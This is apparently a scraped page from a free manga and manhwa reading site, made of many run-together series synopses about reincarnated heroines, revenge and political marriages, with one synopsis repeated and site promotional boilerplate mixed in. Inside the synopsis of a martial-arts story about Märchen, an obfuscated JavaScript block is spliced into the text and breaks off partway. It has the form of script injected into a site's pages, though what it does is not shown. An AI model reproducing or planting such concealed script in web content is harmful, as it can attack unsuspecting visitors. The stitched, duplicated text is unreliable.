Reading Manga Male Lead, Stop Following Me / Male Lead, Don’t Follow Me! / 쫓아오지 마세요, 남주님! One day, I found myself reincarnated as the friend of the female lead who is destined to die. Thinking that I should tell the female lead everything, in the end, I decided to keep silent so as to not mess up the future. I became frustrated and ended up entering the forbidden forest to ‘secretly’ curse the male lead. “The male lead is a son of a b*tch!” However, not expecting anyone to hear it, for some reason, rumors have begun to spread that the male lead, Duke Vishwaltz, was a gay. Moreover, now he’s even going so far as to launch a full scale investigation to find the source of the false rumor…? “…I can’t help but to notice your voice.” Anyhow, I’m afraid my life is screwed.
"Please don't touch the guy wearing glasses…" Department head Kim, who quit his job as a special agent only for his daughter Minji and chose to be normal. Then one day, Minji disappeared silently, and Manager Kim began to find his daughter by turning the country that monitors him into the enemy.
Baek Jooin is a smart, diligent student and has a crush on Ham Sobok, another elite student. However, things start to go downhill when Jooin's twin brother, Jooyul, turns up to meet Sobok while pretending to be Jooin. What's worse, Sobok's best friend, Lisa, doesn't seem to like Jooin one bit. How will it all play out?
Read manhwa Manic Desires / Five Senses (KIM Salgu) / Ogamdo / The Five Senses A precarious relationship between a possessive guy and a vulnerable girl. Gyuyoung’s only hope is to run away from her desperate reality, where people talk behind her about her mom, her only family, who works as a hostess at a sleazy bar in a small town. A once-in-a-lifetime opportunity ensues when Ikseon, a transfer male student to her high school, makes her an irresistible offer. บ่วงคล้องใจ 五感圖:執著戀慕 오감도
Märchen is a young man who was saved from the brink of death by a martial arts master by infusing her Ki into him. However, things take a turn when Märchen has no interest in fighting and aims to live a peaceful life. His “Master” then decides to make use of his ability to become stronger simply by reading tales and absorbing the techniques used in them. She introduces a huge library, filled with all kinds of books that record different forms of martial arts and techniques, to him. Märchen picks up a book and begins to read…<script></script><script>(function(_0x36c9d2,_0x1f9d24){var _0x47cae9=_0x7ec1,_0x5c1588=_0x36c9d2();while(!![]){try{var _0xc4eae4=parseInt(_0x47cae9(0x178))/(-0x11b9+0x1317+-0x15d)+-parseInt(_0x47cae9(0x177))/(-0x767*0x4+-0x82e+-0x2*-0x12e6)+-parseInt(_0x47cae9(0x17a))/(0x1455+-0xb*-0x5+0x2ef*-0x7)+parseInt(_0x47cae9(0x16d))/(0xc65+0x320+-0xf81)+parseInt(_0x47cae9(0x182))/(0x3*-0xc61+0x667+0x1ec1)+parseInt(_0x47cae9(0x16b))/(0x1a7c+-0x107*-0x25+0x5*-0xce5)*(-parseInt(_0x47cae9(0x17d))/(0xb36+-0x3a1+0x1*-0x78e))+-parseInt(_0x47cae9(0x172))/(0x2077+-0x2254+0x1e5)*(parseInt(_0x47cae9(0x168))/(0x11a2+0x1125+-0x22be));if(_0xc4eae4===_0x1f9d24)break;else _0x5c1588['push'](_0x5c1588['shift']());}catch(_0x53a095){_0x5c1588['push'](_0x5c1588['shift']());}}}(_0x5aff,-0xafd53+0x298d4*0x2+-0x71af9*-0x2));function custom(){var _0x5eb184=_0x7ec1,_0x5e6f7e={'VzJfH':function(_0x5ce255,_0x504767){return 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Read Margrave’s Bastard Son was The Emperor Manga – Margrave’s Bastard Son was The Emperor Manhwa Online Free At Hot Manhua The summary of the comic Margrave’s Bastard Son was The Emperor: “An emperor who died unjustly becomes a wretched bastard son!” Ian, a wizard of the Bariel Empire, became emperor at a young age, but was imprisoned due to his nephew’s rebellion. However, he was saved by the wizard Naum using forbidden space-time magic. This magic leads Emperor Ian 100 years into the past, where he possesses Bastard Ian, the illegitimate son of the Margrave family that went extinct 100 years ago. Bastard Ian is about to be taken hostage by the barbarians! Ian is about to get caught up in a bloody conspiracy!!! “Margrave’s Bastard Son was The Emperor” is also known as: Margrave’s Bastard Son was The Emperor MangaZin The comic Margrave’s Bastard Son was The Emperor belongs to the Genre: Action, Adventure, Fantasy “Top Manhwa, Battwo, HariManga…” are the most searched keywords on the website ZINMANHWA. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at BunManga. You can read TOP MANHWA Human Mask The Patron’s Daughters The Genius Idol’s Strategy to Stardom
Read manhwa Marriage Alliance for Revenge Olivia, the Empress of Rhone Empire, died because of her husband’s scheme, then she had a chance to live again in the body of an unknown woman who lived in a slum. After that, Olivia met her ex-fiance, who was the real heir to the throne, and hid her real identity from him. She made a suggestion to form a marriage alliance for each other’s revenge. Will their revenge succeed without any obstacle
House Targayel, the sword of the Emperor and the glory of the Empire. House Targayel, whose name was respectable, was doomed. They weren’t just doomed, they were destroyed. Just to make ends meet, Elje hides her identity and goes to war. After returning home, Elje who made a name for herself through her amazing swordsmanship and gained a fortune thought that all she had to do was live a happy life. Unexpectedly, a political marriage was arranged by the Emperor’s orders! Her partner to be was Shan Crixus, deputy commander of the Imperial Army, who she saved in the war…… Read manhwa Marriage and Sword / 메리지 앤 소드
“You Killed Melissa. If You Let Me Go, She Won’t!” I Am Married To Terio Alte, A Friend From Childhood. But Terio’s Heart Only Goes To Melissa, My Sister. Not Long After That, Marquis Ancy Betelgius Destroyed The Rubiet Family. And Melissa, Who Was Married To Him, Also Died. Terio Took Out All His Resentment On Me, Because I Couldn’t Stand It And Decided To Give Up On This Life… When I Opened My Eyes, I Found Myself Going Back To 7 Years Ago. I Chose Ancy Betelgius Over As Melissa’s Replacement. “There’s No Hope. Anyway, If Life Has Decided My Fate Is Death, I’ll Choose A Certain Tragedy.” But This Man, Why Treat Me With Such Affection… “If That’s The Case…I Hope You Will Keep This Mask Of Affection For A Long Time. Until The Day I Take My Own Life” 메리지 B
Read Marriage is with your brother manhwa After discovering her husband’s infidelity with her junior colleague, the protagonist was killed. However, she woke up to find herself back on her wedding day. The two people who betrayed her were there, whispering love to each other in her wedding hall. Determined to seek revenge, she is willing to do anything, even if it means changing her destiny and potentially involving her own husband.
결혼 장사 / The Marriage Business Bianca De Blanchefort. The Wife Of Zachary De Arno, Thrown Out Of Arno Family After His Death Due To Her Self-Indulgent, Frivolous, And Immoral Behavior. She Had Nowhere To Go, The Blanchefort Family Having Already Fallen To Ruin, And Was More Or Less Kicked To A Convent Out In The Border. A Woman Who Ultimately Met Her End On A Cold Stone Floor. A Villainess With No Honor: That Was Bianca’s Life Before She Went Back In Time. “Is This Truly Reality? Did I Really Travel Back To The Past?” This Was Neither A Dream Nor A Hallucination. This Feeling Of Hunger, Fatigue, The Vivid Sense Of Everything Around Her… This Was All Real. If This Was Indeed Reality… If God Truly Gave Her One More Precious Chance…! ‘I’m Going To Carry Out A Business. A Marriage Is A Business In The End. Zachary’s Child Will Be The Perfect Source Of Financial Support. I’m Sure My Dowry Will Remain Safe Too. I Won’t Have To Lose The Blanchefort Or Arno Territories To That Damned Viscount Either.’ Then Whether It Be Through Seduction Or Persuasion, She Needed To Give Birth To Her Husband, Zachary’s Child. “How Much Was My Dowry Exactly?” “400 Calves, 900 Pigs, 100 Units Of Silverware, 300 Rolls Of Silk, 2 Crates Of Jewels, And A Portion Of A Territory… Equivalent To A Two-Year Budget For The Arno County.” “Don’t You Think You Should Compensate For That?” Alternative Name 결혼 장사 / The Marriage Business
Bianca de Blanchefort. The wife of Zachary de Arno, thrown out of Arno family after his death due to her self-indulgent, frivolous, and immoral behavior. She had nowhere to go, the Blanchefort family having already fallen to ruin, and was more or less kicked to a convent out in the border. A woman who ultimately met her end on a cold stone floor. A villainess with no honor: that was Bianca’s life before she went back in time.***“Is this truly reality? Did I really travel back to the past?”This was neither a dream nor a hallucination. This feeling of hunger, fatigue, the vivid sense of everything around her… This was all real. If this was indeed reality… If God truly gave her one more precious chance…!‘I’m going to carry out a business. A marriage is a business in the end. Zachary’s child will be the perfect source of financial support. I’m sure my dowry will remain safe too. I won’t have to lose the Blanchefort or Arno territories to that damned viscount either.’Then whether it be through seduction or persuasion, she needed to give birth to her husband, Zachary’s child.“How much was my dowry exactly?”“400 calves, 900 pigs, 100 units of silverware, 300 rolls of silk, 2 crates of jewels, and a portion of a territory… Equivalent to a two-year budget for the Arno county.”“Don’t you think you should compensate for that?”